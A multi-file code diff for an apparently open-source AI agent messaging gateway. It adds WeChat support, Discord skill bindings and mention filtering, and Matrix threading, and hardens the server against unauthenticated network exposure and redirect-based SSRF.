logger.warning("mark_job_run: job_id %s not found, skipping save", job_id)
|
||||
|
||||
|
||||
def advance_next_run(job_id: str) -> bool:
|
||||
|
||||
+3
-2
@@ -44,7 +44,7 @@ logger = logging.getLogger(__name__)
|
||||
_KNOWN_DELIVERY_PLATFORMS = frozenset({
|
||||
"telegram", "discord", "slack", "whatsapp", "signal",
|
||||
"matrix", "mattermost", "homeassistant", "dingtalk", "feishu",
|
||||
"wecom", "sms", "email", "webhook", "bluebubbles",
|
||||
"wecom", "weixin", "sms", "email", "webhook", "bluebubbles",
|
||||
})
|
||||
|
||||
from cron.jobs import get_due_jobs, mark_job_run, save_job_output, advance_next_run
|
||||
@@ -234,6 +234,7 @@ def _deliver_result(job: dict, content: str, adapters=None, loop=None) -> Option
|
||||
"dingtalk": Platform.DINGTALK,
|
||||
"feishu": Platform.FEISHU,
|
||||
"wecom": Platform.WECOM,
|
||||
"weixin": Platform.WEIXIN,
|
||||
"email": Platform.EMAIL,
|
||||
"sms": Platform.SMS,
|
||||
"bluebubbles": Platform.BLUEBUBBLES,
|
||||
@@ -768,7 +769,7 @@ def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
|
||||
_cron_pool.shutdown(wait=False, cancel_futures=True)
|
||||
raise
|
||||
finally:
|
||||
_cron_pool.shutdown(wait=False)
|
||||
_cron_pool.shutdown(wait=False, cancel_futures=True)
|
||||
|
||||
if _inactivity_timeout:
|
||||
# Build diagnostic summary from the agent's activity tracker.
|
||||
|
||||
@@ -9,7 +9,10 @@ INSTALL_DIR="/opt/hermes"
|
||||
# (cache/images, cache/audio, platforms/whatsapp, etc.) are created on
|
||||
# demand by the application — don't pre-create them here so new installs
|
||||
# get the consolidated layout from get_hermes_dir().
|
||||
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills}
|
||||
# The "home/" subdirectory is a per-profile HOME for subprocesses (git,
|
||||
# ssh, gh, npm …). Without it those tools write to /root which is
|
||||
# ephemeral and shared across profiles. See issue #4426.
|
||||
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills,skins,plans,workspace,home}
|
||||
|
||||
# .env
|
||||
if [ ! -f "$HERMES_HOME/.env" ]; then
|
||||
|
||||
@@ -76,10 +76,15 @@ def build_channel_directory(adapters: Dict[Any, Any]) -> Dict[str, Any]:
|
||||
except Exception as e:
|
||||
logger.warning("Channel directory: failed to build %s: %s", platform.value, e)
|
||||
|
||||
# Telegram, WhatsApp & Signal can't enumerate chats -- pull from session history
|
||||
for plat_name in ("telegram", "whatsapp", "signal", "email", "sms", "bluebubbles"):
|
||||
if plat_name not in platforms:
|
||||
platforms[plat_name] = _build_from_sessions(plat_name)
|
||||
# Platforms that don't support direct channel enumeration get session-based
|
||||
# discovery automatically. Skip infrastructure entries that aren't messaging
|
||||
# platforms — everything else falls through to _build_from_sessions().
|
||||
_SKIP_SESSION_DISCOVERY = frozenset({"local", "api_server", "webhook"})
|
||||
for plat in Platform:
|
||||
plat_name = plat.value
|
||||
if plat_name in _SKIP_SESSION_DISCOVERY or plat_name in platforms:
|
||||
continue
|
||||
platforms[plat_name] = _build_from_sessions(plat_name)
|
||||
|
||||
directory = {
|
||||
"updated_at": datetime.now().isoformat(),
|
||||
|
||||
@@ -63,6 +63,7 @@ class Platform(Enum):
|
||||
WEBHOOK = "webhook"
|
||||
FEISHU = "feishu"
|
||||
WECOM = "wecom"
|
||||
WEIXIN = "weixin"
|
||||
BLUEBUBBLES = "bluebubbles"
|
||||
|
||||
|
||||
@@ -261,6 +262,11 @@ class GatewayConfig:
|
||||
for platform, config in self.platforms.items():
|
||||
if not config.enabled:
|
||||
continue
|
||||
# Weixin requires both a token and an account_id
|
||||
if platform == Platform.WEIXIN:
|
||||
if config.extra.get("account_id") and (config.token or config.extra.get("token")):
|
||||
connected.append(platform)
|
||||
continue
|
||||
# Platforms that use token/api_key auth
|
||||
if config.token or config.api_key:
|
||||
connected.append(platform)
|
||||
@@ -536,6 +542,8 @@ def load_gateway_config() -> GatewayConfig:
|
||||
bridged["free_response_channels"] = platform_cfg["free_response_channels"]
|
||||
if "mention_patterns" in platform_cfg:
|
||||
bridged["mention_patterns"] = platform_cfg["mention_patterns"]
|
||||
if plat == Platform.DISCORD and "channel_skill_bindings" in platform_cfg:
|
||||
bridged["channel_skill_bindings"] = platform_cfg["channel_skill_bindings"]
|
||||
if not bridged:
|
||||
continue
|
||||
plat_data = platforms_data.setdefault(plat.value, {})
|
||||
@@ -634,6 +642,8 @@ def load_gateway_config() -> GatewayConfig:
|
||||
os.environ["MATRIX_FREE_RESPONSE_ROOMS"] = str(frc)
|
||||
if "auto_thread" in matrix_cfg and not os.getenv("MATRIX_AUTO_THREAD"):
|
||||
os.environ["MATRIX_AUTO_THREAD"] = str(matrix_cfg["auto_thread"]).lower()
|
||||
if "dm_mention_threads" in matrix_cfg and not os.getenv("MATRIX_DM_MENTION_THREADS"):
|
||||
os.environ["MATRIX_DM_MENTION_THREADS"] = str(matrix_cfg["dm_mention_threads"]).lower()
|
||||
|
||||
except Exception as e:
|
||||
logger.warning(
|
||||
@@ -672,6 +682,7 @@ def load_gateway_config() -> GatewayConfig:
|
||||
Platform.SLACK: "SLACK_BOT_TOKEN",
|
||||
Platform.MATTERMOST: "MATTERMOST_TOKEN",
|
||||
Platform.MATRIX: "MATRIX_ACCESS_TOKEN",
|
||||
Platform.WEIXIN: "WEIXIN_TOKEN",
|
||||
}
|
||||
for platform, pconfig in config.platforms.items():
|
||||
if not pconfig.enabled:
|
||||
@@ -976,6 +987,44 @@ def _apply_env_overrides(config: GatewayConfig) -> None:
|
||||
name=os.getenv("WECOM_HOME_CHANNEL_NAME", "Home"),
|
||||
)
|
||||
|
||||
# Weixin (personal WeChat via iLink Bot API)
|
||||
weixin_token = os.getenv("WEIXIN_TOKEN")
|
||||
weixin_account_id = os.getenv("WEIXIN_ACCOUNT_ID")
|
||||
if weixin_token or weixin_account_id:
|
||||
if Platform.WEIXIN not in config.platforms:
|
||||
config.platforms[Platform.WEIXIN] = PlatformConfig()
|
||||
config.platforms[Platform.WEIXIN].enabled = True
|
||||
if weixin_token:
|
||||
config.platforms[Platform.WEIXIN].token = weixin_token
|
||||
extra = config.platforms[Platform.WEIXIN].extra
|
||||
if weixin_account_id:
|
||||
extra["account_id"] = weixin_account_id
|
||||
weixin_base_url = os.getenv("WEIXIN_BASE_URL", "").strip()
|
||||
if weixin_base_url:
|
||||
extra["base_url"] = weixin_base_url.rstrip("/")
|
||||
weixin_cdn_base_url = os.getenv("WEIXIN_CDN_BASE_URL", "").strip()
|
||||
if weixin_cdn_base_url:
|
||||
extra["cdn_base_url"] = weixin_cdn_base_url.rstrip("/")
|
||||
weixin_dm_policy = os.getenv("WEIXIN_DM_POLICY", "").strip().lower()
|
||||
if weixin_dm_policy:
|
||||
extra["dm_policy"] = weixin_dm_policy
|
||||
weixin_group_policy = os.getenv("WEIXIN_GROUP_POLICY", "").strip().lower()
|
||||
if weixin_group_policy:
|
||||
extra["group_policy"] = weixin_group_policy
|
||||
weixin_allowed_users = os.getenv("WEIXIN_ALLOWED_USERS", "").strip()
|
||||
if weixin_allowed_users:
|
||||
extra["allow_from"] = weixin_allowed_users
|
||||
weixin_group_allowed_users = os.getenv("WEIXIN_GROUP_ALLOWED_USERS", "").strip()
|
||||
if weixin_group_allowed_users:
|
||||
extra["group_allow_from"] = weixin_group_allowed_users
|
||||
weixin_home = os.getenv("WEIXIN_HOME_CHANNEL", "").strip()
|
||||
if weixin_home:
|
||||
config.platforms[Platform.WEIXIN].home_channel = HomeChannel(
|
||||
platform=Platform.WEIXIN,
|
||||
chat_id=weixin_home,
|
||||
name=os.getenv("WEIXIN_HOME_CHANNEL_NAME", "Home"),
|
||||
)
|
||||
|
||||
# BlueBubbles (iMessage)
|
||||
bluebubbles_server_url = os.getenv("BLUEBUBBLES_SERVER_URL")
|
||||
bluebubbles_password = os.getenv("BLUEBUBBLES_PASSWORD")
|
||||
|
||||
@@ -20,10 +20,12 @@ Requires:
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import hashlib
|
||||
import hmac
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import socket as _socket
|
||||
import re
|
||||
import sqlite3
|
||||
import time
|
||||
@@ -41,6 +43,7 @@ from gateway.config import Platform, PlatformConfig
|
||||
from gateway.platforms.base import (
|
||||
BasePlatformAdapter,
|
||||
SendResult,
|
||||
is_network_accessible,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
@@ -283,6 +286,24 @@ def _make_request_fingerprint(body: Dict[str, Any], keys: List[str]) -> str:
|
||||
return sha256(repr(subset).encode("utf-8")).hexdigest()
|
||||
|
||||
|
||||
def _derive_chat_session_id(
|
||||
system_prompt: Optional[str],
|
||||
first_user_message: str,
|
||||
) -> str:
|
||||
"""Derive a stable session ID from the conversation's first user message.
|
||||
|
||||
OpenAI-compatible frontends (Open WebUI, LibreChat, etc.) send the full
|
||||
conversation history with every request. The system prompt and first user
|
||||
message are constant across all turns of the same conversation, so hashing
|
||||
them produces a deterministic session ID that lets the API server reuse
|
||||
the same Hermes session (and therefore the same Docker container sandbox
|
||||
directory) across turns.
|
||||
"""
|
||||
seed = f"{system_prompt or ''}\n{first_user_message}"
|
||||
digest = hashlib.sha256(seed.encode("utf-8")).hexdigest()[:16]
|
||||
return f"api-{digest}"
|
||||
|
||||
|
||||
class APIServerAdapter(BasePlatformAdapter):
|
||||
"""
|
||||
OpenAI-compatible HTTP API server adapter.
|
||||
@@ -387,7 +408,8 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
Validate Bearer token from Authorization header.
|
||||
|
||||
Returns None if auth is OK, or a 401 web.Response on failure.
|
||||
If no API key is configured, all requests are allowed.
|
||||
If no API key is configured, all requests are allowed (only when API
|
||||
server is local).
|
||||
"""
|
||||
if not self._api_key:
|
||||
return None # No key configured — allow all (local-only use)
|
||||
@@ -590,7 +612,16 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
logger.warning("Failed to load session history for %s: %s", session_id, e)
|
||||
history = []
|
||||
else:
|
||||
session_id = str(uuid.uuid4())
|
||||
# Derive a stable session ID from the conversation fingerprint so
|
||||
# that consecutive messages from the same Open WebUI (or similar)
|
||||
# conversation map to the same Hermes session. The first user
|
||||
# message + system prompt are constant across all turns.
|
||||
first_user = ""
|
||||
for cm in conversation_messages:
|
||||
if cm.get("role") == "user":
|
||||
first_user = cm.get("content", "")
|
||||
break
|
||||
session_id = _derive_chat_session_id(system_prompt, first_user)
|
||||
# history already set from request body above
|
||||
|
||||
completion_id = f"chatcmpl-{uuid.uuid4().hex[:29]}"
|
||||
@@ -1366,6 +1397,7 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
result = agent.run_conversation(
|
||||
user_message=user_message,
|
||||
conversation_history=conversation_history,
|
||||
task_id="default",
|
||||
)
|
||||
usage = {
|
||||
"input_tokens": getattr(agent, "session_prompt_tokens", 0) or 0,
|
||||
@@ -1532,6 +1564,7 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
r = agent.run_conversation(
|
||||
user_message=user_message,
|
||||
conversation_history=conversation_history,
|
||||
task_id="default",
|
||||
)
|
||||
u = {
|
||||
"input_tokens": getattr(agent, "session_prompt_tokens", 0) or 0,
|
||||
@@ -1683,8 +1716,16 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
if hasattr(sweep_task, "add_done_callback"):
|
||||
sweep_task.add_done_callback(self._background_tasks.discard)
|
||||
|
||||
# Refuse to start network-accessible without authentication
|
||||
if is_network_accessible(self._host) and not self._api_key:
|
||||
logger.error(
|
||||
"[%s] Refusing to start: binding to %s requires API_SERVER_KEY. "
|
||||
"Set API_SERVER_KEY or use the default 127.0.0.1.",
|
||||
self.name, self._host,
|
||||
)
|
||||
return False
|
||||
|
||||
# Port conflict detection — fail fast if port is already in use
|
||||
import socket as _socket
|
||||
try:
|
||||
with _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM) as _s:
|
||||
_s.settimeout(1)
|
||||
|
||||
+76
-10
@@ -6,10 +6,12 @@ and implement the required methods.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import ipaddress
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
import socket as _socket
|
||||
import subprocess
|
||||
import sys
|
||||
import uuid
|
||||
@@ -19,6 +21,41 @@ from urllib.parse import urlsplit
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def is_network_accessible(host: str) -> bool:
|
||||
"""Return True if *host* would expose the server beyond loopback.
|
||||
|
||||
Loopback addresses (127.0.0.1, ::1, IPv4-mapped ::ffff:127.0.0.1)
|
||||
are local-only. Unspecified addresses (0.0.0.0, ::) bind all
|
||||
interfaces. Hostnames are resolved; DNS failure fails closed.
|
||||
"""
|
||||
try:
|
||||
addr = ipaddress.ip_address(host)
|
||||
if addr.is_loopback:
|
||||
return False
|
||||
# ::ffff:127.0.0.1 — Python reports is_loopback=False for mapped
|
||||
# addresses, so check the underlying IPv4 explicitly.
|
||||
if getattr(addr, "ipv4_mapped", None) and addr.ipv4_mapped.is_loopback:
|
||||
return False
|
||||
return True
|
||||
except ValueError:
|
||||
# when host variable is a hostname, we should try to resolve below
|
||||
pass
|
||||
|
||||
try:
|
||||
resolved = _socket.getaddrinfo(
|
||||
host, None, _socket.AF_UNSPEC, _socket.SOCK_STREAM,
|
||||
)
|
||||
# if the hostname resolves into at least one non-loopback address,
|
||||
# then we consider it to be network accessible
|
||||
for _family, _type, _proto, _canonname, sockaddr in resolved:
|
||||
addr = ipaddress.ip_address(sockaddr[0])
|
||||
if not addr.is_loopback:
|
||||
return True
|
||||
return False
|
||||
except (_socket.gaierror, OSError):
|
||||
return True
|
||||
|
||||
|
||||
def _detect_macos_system_proxy() -> str | None:
|
||||
"""Read the macOS system HTTP(S) proxy via ``scutil --proxy``.
|
||||
|
||||
@@ -160,7 +197,7 @@ GATEWAY_SECRET_CAPTURE_UNSUPPORTED_MESSAGE = (
|
||||
)
|
||||
|
||||
|
||||
def _safe_url_for_log(url: str, max_len: int = 80) -> str:
|
||||
def safe_url_for_log(url: str, max_len: int = 80) -> str:
|
||||
"""Return a URL string safe for logs (no query/fragment/userinfo)."""
|
||||
if max_len <= 0:
|
||||
return ""
|
||||
@@ -197,6 +234,23 @@ def _safe_url_for_log(url: str, max_len: int = 80) -> str:
|
||||
return f"{safe[:max_len - 3]}..."
|
||||
|
||||
|
||||
async def _ssrf_redirect_guard(response):
|
||||
"""Re-validate each redirect target to prevent redirect-based SSRF.
|
||||
|
||||
Without this, an attacker can host a public URL that 302-redirects to
|
||||
http://169.254.169.254/ and bypass the pre-flight is_safe_url() check.
|
||||
|
||||
Must be async because httpx.AsyncClient awaits response event hooks.
|
||||
"""
|
||||
if response.is_redirect and response.next_request:
|
||||
redirect_url = str(response.next_request.url)
|
||||
from tools.url_safety import is_safe_url
|
||||
if not is_safe_url(redirect_url):
|
||||
raise ValueError(
|
||||
f"Blocked redirect to private/internal address: {safe_url_for_log(redirect_url)}"
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Image cache utilities
|
||||
#
|
||||
@@ -281,7 +335,7 @@ async def cache_image_from_url(url: str, ext: str = ".jpg", retries: int = 2) ->
|
||||
"""
|
||||
from tools.url_safety import is_safe_url
|
||||
if not is_safe_url(url):
|
||||
raise ValueError(f"Blocked unsafe URL (SSRF protection): {_safe_url_for_log(url)}")
|
||||
raise ValueError(f"Blocked unsafe URL (SSRF protection): {safe_url_for_log(url)}")
|
||||
|
||||
import asyncio
|
||||
import httpx
|
||||
@@ -289,7 +343,11 @@ async def cache_image_from_url(url: str, ext: str = ".jpg", retries: int = 2) ->
|
||||
_log = _logging.getLogger(__name__)
|
||||
|
||||
last_exc = None
|
||||
async with httpx.AsyncClient(timeout=30.0, follow_redirects=True) as client:
|
||||
async with httpx.AsyncClient(
|
||||
timeout=30.0,
|
||||
follow_redirects=True,
|
||||
event_hooks={"response": [_ssrf_redirect_guard]},
|
||||
) as client:
|
||||
for attempt in range(retries + 1):
|
||||
try:
|
||||
response = await client.get(
|
||||
@@ -311,7 +369,7 @@ async def cache_image_from_url(url: str, ext: str = ".jpg", retries: int = 2) ->
|
||||
"Media cache retry %d/%d for %s (%.1fs): %s",
|
||||
attempt + 1,
|
||||
retries,
|
||||
_safe_url_for_log(url),
|
||||
safe_url_for_log(url),
|
||||
wait,
|
||||
exc,
|
||||
)
|
||||
@@ -396,7 +454,7 @@ async def cache_audio_from_url(url: str, ext: str = ".ogg", retries: int = 2) ->
|
||||
"""
|
||||
from tools.url_safety import is_safe_url
|
||||
if not is_safe_url(url):
|
||||
raise ValueError(f"Blocked unsafe URL (SSRF protection): {_safe_url_for_log(url)}")
|
||||
raise ValueError(f"Blocked unsafe URL (SSRF protection): {safe_url_for_log(url)}")
|
||||
|
||||
import asyncio
|
||||
import httpx
|
||||
@@ -404,7 +462,11 @@ async def cache_audio_from_url(url: str, ext: str = ".ogg", retries: int = 2) ->
|
||||
_log = _logging.getLogger(__name__)
|
||||
|
||||
last_exc = None
|
||||
async with httpx.AsyncClient(timeout=30.0, follow_redirects=True) as client:
|
||||
async with httpx.AsyncClient(
|
||||
timeout=30.0,
|
||||
follow_redirects=True,
|
||||
event_hooks={"response": [_ssrf_redirect_guard]},
|
||||
) as client:
|
||||
for attempt in range(retries + 1):
|
||||
try:
|
||||
response = await client.get(
|
||||
@@ -426,7 +488,7 @@ async def cache_audio_from_url(url: str, ext: str = ".ogg", retries: int = 2) ->
|
||||
"Audio cache retry %d/%d for %s (%.1fs): %s",
|
||||
attempt + 1,
|
||||
retries,
|
||||
_safe_url_for_log(url),
|
||||
safe_url_for_log(url),
|
||||
wait,
|
||||
exc,
|
||||
)
|
||||
@@ -564,8 +626,9 @@ class MessageEvent:
|
||||
reply_to_message_id: Optional[str] = None
|
||||
reply_to_text: Optional[str] = None # Text of the replied-to message (for context injection)
|
||||
|
||||
# Auto-loaded skill for topic/channel bindings (e.g., Telegram DM Topics)
|
||||
auto_skill: Optional[str] = None
|
||||
# Auto-loaded skill(s) for topic/channel bindings (e.g., Telegram DM Topics,
|
||||
# Discord channel_skill_bindings). A single name or ordered list.
|
||||
auto_skill: Optional[str | list[str]] = None
|
||||
|
||||
# Internal flag — set for synthetic events (e.g. background process
|
||||
# completion notifications) that must bypass user authorization checks.
|
||||
@@ -587,6 +650,9 @@ class MessageEvent:
|
||||
raw = parts[0][1:].lower() if parts else None
|
||||
if raw and "@" in raw:
|
||||
raw = raw.split("@", 1)[0]
|
||||
# Reject file paths: valid command names never contain /
|
||||
if raw and "/" in raw:
|
||||
return None
|
||||
return raw
|
||||
|
||||
def get_command_args(self) -> str:
|
||||
@@ -1525,7 +1591,7 @@ class BasePlatformAdapter(ABC):
|
||||
logger.info(
|
||||
"[%s] Sending image: %s (alt=%s)",
|
||||
self.name,
|
||||
_safe_url_for_log(image_url),
|
||||
safe_url_for_log(image_url),
|
||||
alt_text[:30] if alt_text else "",
|
||||
)
|
||||
# Route animated GIFs through send_animation for proper playback
|
||||
|
||||
@@ -606,22 +606,35 @@ class DiscordAdapter(BasePlatformAdapter):
|
||||
if not self._client.user or self._client.user not in message.mentions:
|
||||
return
|
||||
# "all" falls through to handle_message
|
||||
|
||||
# If the message @mentions other users but NOT the bot, the
|
||||
# sender is talking to someone else — stay silent. Only
|
||||
# applies in server channels; in DMs the user is always
|
||||
# talking to the bot (mentions are just references).
|
||||
# Controlled by DISCORD_IGNORE_NO_MENTION (default: true).
|
||||
_ignore_no_mention = os.getenv(
|
||||
"DISCORD_IGNORE_NO_MENTION", "true"
|
||||
).lower() in ("true", "1", "yes")
|
||||
if _ignore_no_mention and message.mentions and not isinstance(message.channel, discord.DMChannel):
|
||||
_bot_mentioned = (
|
||||
|
||||
# Multi-agent filtering: if the message mentions specific bots
|
||||
# but NOT this bot, the sender is talking to another agent —
|
||||
# stay silent. Messages with no bot mentions (general chat)
|
||||
# still fall through to _handle_message for the existing
|
||||
# DISCORD_REQUIRE_MENTION check.
|
||||
#
|
||||
# This replaces the older DISCORD_IGNORE_NO_MENTION logic
|
||||
# with bot-aware filtering that works correctly when multiple
|
||||
# agents share a channel.
|
||||
if not isinstance(message.channel, discord.DMChannel) and message.mentions:
|
||||
_self_mentioned = (
|
||||
self._client.user is not None
|
||||
and self._client.user in message.mentions
|
||||
)
|
||||
if not _bot_mentioned:
|
||||
return # Talking to someone else, don't interrupt
|
||||
_other_bots_mentioned = any(
|
||||
m.bot and m != self._client.user
|
||||
for m in message.mentions
|
||||
)
|
||||
# If other bots are mentioned but we're not → not for us
|
||||
if _other_bots_mentioned and not _self_mentioned:
|
||||
return
|
||||
# If humans are mentioned but we're not → not for us
|
||||
# (preserves old DISCORD_IGNORE_NO_MENTION=true behavior)
|
||||
_ignore_no_mention = os.getenv(
|
||||
"DISCORD_IGNORE_NO_MENTION", "true"
|
||||
).lower() in ("true", "1", "yes")
|
||||
if _ignore_no_mention and not _self_mentioned and not _other_bots_mentioned:
|
||||
return
|
||||
|
||||
await self._handle_message(message)
|
||||
|
||||
@@ -1892,14 +1905,42 @@ class DiscordAdapter(BasePlatformAdapter):
|
||||
chat_topic=chat_topic,
|
||||
)
|
||||
|
||||
_parent_id = str(getattr(getattr(interaction, "channel", None), "parent_id", "") or "")
|
||||
_skills = self._resolve_channel_skills(thread_id, _parent_id or None)
|
||||
event = MessageEvent(
|
||||
text=text,
|
||||
message_type=MessageType.TEXT,
|
||||
source=source,
|
||||
raw_message=interaction,
|
||||
auto_skill=_skills,
|
||||
)
|
||||
await self.handle_message(event)
|
||||
|
||||
def _resolve_channel_skills(self, channel_id: str, parent_id: str | None = None) -> list[str] | None:
|
||||
"""Look up auto-skill bindings for a Discord channel/forum thread.
|
||||
|
||||
Config format (in platform extra):
|
||||
channel_skill_bindings:
|
||||
- id: "123456"
|
||||
skills: ["skill-a", "skill-b"]
|
||||
Also checks parent_id so forum threads inherit the forum's bindings.
|
||||
"""
|
||||
bindings = self.config.extra.get("channel_skill_bindings", [])
|
||||
if not bindings:
|
||||
return None
|
||||
ids_to_check = {channel_id}
|
||||
if parent_id:
|
||||
ids_to_check.add(parent_id)
|
||||
for entry in bindings:
|
||||
entry_id = str(entry.get("id", ""))
|
||||
if entry_id in ids_to_check:
|
||||
skills = entry.get("skills") or entry.get("skill")
|
||||
if isinstance(skills, str):
|
||||
return [skills]
|
||||
if isinstance(skills, list) and skills:
|
||||
return list(dict.fromkeys(skills)) # dedup, preserve order
|
||||
return None
|
||||
|
||||
def _thread_parent_channel(self, channel: Any) -> Any:
|
||||
"""Return the parent text channel when invoked from a thread."""
|
||||
return getattr(channel, "parent", None) or channel
|
||||
@@ -2484,6 +2525,10 @@ class DiscordAdapter(BasePlatformAdapter):
|
||||
if not event_text or not event_text.strip():
|
||||
event_text = "(The user sent a message with no text content)"
|
||||
|
||||
_chan = message.channel
|
||||
_parent_id = str(getattr(_chan, "parent_id", "") or "")
|
||||
_chan_id = str(getattr(_chan, "id", ""))
|
||||
_skills = self._resolve_channel_skills(_chan_id, _parent_id or None)
|
||||
event = MessageEvent(
|
||||
text=event_text,
|
||||
message_type=msg_type,
|
||||
@@ -2494,6 +2539,7 @@ class DiscordAdapter(BasePlatformAdapter):
|
||||
media_types=media_types,
|
||||
reply_to_message_id=str(message.reference.message_id) if message.reference else None,
|
||||
timestamp=message.created_at,
|
||||
auto_skill=_skills,
|
||||
)
|
||||
|
||||
# Track thread participation so the bot won't require @mention for
|
||||
|
||||
@@ -1190,6 +1190,8 @@ class FeishuAdapter(BasePlatformAdapter):
|
||||
lambda data: self._on_reaction_event("im.message.reaction.deleted_v1", data)
|
||||
)
|
||||
.register_p2_card_action_trigger(self._on_card_action_trigger)
|
||||
.register_p2_im_chat_member_bot_added_v1(self._on_bot_added_to_chat)
|
||||
.register_p2_im_chat_member_bot_deleted_v1(self._on_bot_removed_from_chat)
|
||||
.build()
|
||||
)
|
||||
|
||||
@@ -1580,13 +1582,18 @@ class FeishuAdapter(BasePlatformAdapter):
|
||||
return SendResult(success=False, error=f"Image file not found: {image_path}")
|
||||
|
||||
try:
|
||||
with open(image_path, "rb") as image_file:
|
||||
body = self._build_image_upload_body(
|
||||
image_type=_FEISHU_IMAGE_UPLOAD_TYPE,
|
||||
image=image_file,
|
||||
)
|
||||
request = self._build_image_upload_request(body)
|
||||
upload_response = await asyncio.to_thread(self._client.im.v1.image.create, request)
|
||||
import io as _io
|
||||
with open(image_path, "rb") as f:
|
||||
image_bytes = f.read()
|
||||
# Wrap in BytesIO so lark SDK's MultipartEncoder can read .name and .tell()
|
||||
image_file = _io.BytesIO(image_bytes)
|
||||
image_file.name = os.path.basename(image_path)
|
||||
body = self._build_image_upload_body(
|
||||
image_type=_FEISHU_IMAGE_UPLOAD_TYPE,
|
||||
image=image_file,
|
||||
)
|
||||
request = self._build_image_upload_request(body)
|
||||
upload_response = await asyncio.to_thread(self._client.im.v1.image.create, request)
|
||||
image_key = self._extract_response_field(upload_response, "image_key")
|
||||
if not image_key:
|
||||
return self._response_error_result(
|
||||
|
||||
+35
-10
@@ -18,6 +18,7 @@ Environment variables:
|
||||
MATRIX_REQUIRE_MENTION Require @mention in rooms (default: true)
|
||||
MATRIX_FREE_RESPONSE_ROOMS Comma-separated room IDs exempt from mention requirement
|
||||
MATRIX_AUTO_THREAD Auto-create threads for room messages (default: true)
|
||||
MATRIX_DM_MENTION_THREADS Create a thread when bot is @mentioned in a DM (default: false)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
@@ -177,6 +178,9 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
self._reactions_enabled: bool = os.getenv(
|
||||
"MATRIX_REACTIONS", "true"
|
||||
).lower() not in ("false", "0", "no")
|
||||
# Tracks the reaction event_id for in-progress (eyes) reactions.
|
||||
# Key: (room_id, message_event_id) → reaction_event_id (for the eyes reaction).
|
||||
self._pending_reactions: dict[tuple[str, str], str] = {}
|
||||
|
||||
# Text batching: merge rapid successive messages (Telegram-style).
|
||||
# Matrix clients split long messages around 4000 chars.
|
||||
@@ -1040,6 +1044,13 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
if not self._is_bot_mentioned(body, formatted_body):
|
||||
return
|
||||
|
||||
# DM mention-thread: when enabled, @mentioning bot in a DM creates a thread.
|
||||
if is_dm and not thread_id:
|
||||
dm_mention_threads = os.getenv("MATRIX_DM_MENTION_THREADS", "false").lower() in ("true", "1", "yes")
|
||||
if dm_mention_threads and self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
thread_id = event.event_id
|
||||
self._track_thread(thread_id)
|
||||
|
||||
# Strip mention from body when present (including in DMs).
|
||||
if self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
body = self._strip_mention(body)
|
||||
@@ -1357,6 +1368,13 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
if not self._is_bot_mentioned(body, formatted_body):
|
||||
return
|
||||
|
||||
# DM mention-thread: when enabled, @mentioning bot in a DM creates a thread.
|
||||
if is_dm and not thread_id:
|
||||
dm_mention_threads = os.getenv("MATRIX_DM_MENTION_THREADS", "false").lower() in ("true", "1", "yes")
|
||||
if dm_mention_threads and self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
thread_id = event.event_id
|
||||
self._track_thread(thread_id)
|
||||
|
||||
# Strip mention from body when present (including in DMs).
|
||||
if self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
body = self._strip_mention(body)
|
||||
@@ -1437,12 +1455,14 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
|
||||
async def _send_reaction(
|
||||
self, room_id: str, event_id: str, emoji: str,
|
||||
) -> bool:
|
||||
"""Send an emoji reaction to a message in a room."""
|
||||
) -> Optional[str]:
|
||||
"""Send an emoji reaction to a message in a room.
|
||||
Returns the reaction event_id on success, None on failure.
|
||||
"""
|
||||
import nio
|
||||
|
||||
if not self._client:
|
||||
return False
|
||||
return None
|
||||
content = {
|
||||
"m.relates_to": {
|
||||
"rel_type": "m.annotation",
|
||||
@@ -1457,12 +1477,12 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
)
|
||||
if isinstance(resp, nio.RoomSendResponse):
|
||||
logger.debug("Matrix: sent reaction %s to %s", emoji, event_id)
|
||||
return True
|
||||
return resp.event_id
|
||||
logger.debug("Matrix: reaction send failed: %s", resp)
|
||||
return False
|
||||
return None
|
||||
except Exception as exc:
|
||||
logger.debug("Matrix: reaction send error: %s", exc)
|
||||
return False
|
||||
return None
|
||||
|
||||
async def _redact_reaction(
|
||||
self, room_id: str, reaction_event_id: str, reason: str = "",
|
||||
@@ -1477,7 +1497,9 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
msg_id = event.message_id
|
||||
room_id = event.source.chat_id
|
||||
if msg_id and room_id:
|
||||
await self._send_reaction(room_id, msg_id, "\U0001f440")
|
||||
reaction_event_id = await self._send_reaction(room_id, msg_id, "\U0001f440")
|
||||
if reaction_event_id:
|
||||
self._pending_reactions[(room_id, msg_id)] = reaction_event_id
|
||||
|
||||
async def on_processing_complete(
|
||||
self, event: MessageEvent, outcome: ProcessingOutcome,
|
||||
@@ -1491,9 +1513,12 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
return
|
||||
if outcome == ProcessingOutcome.CANCELLED:
|
||||
return
|
||||
# Note: Matrix doesn't support removing a specific reaction easily
|
||||
# without tracking the reaction event_id. We send the new reaction;
|
||||
# the eyes stays (acceptable UX — both are visible).
|
||||
# Remove the eyes reaction first, if we tracked its event_id.
|
||||
reaction_key = (room_id, msg_id)
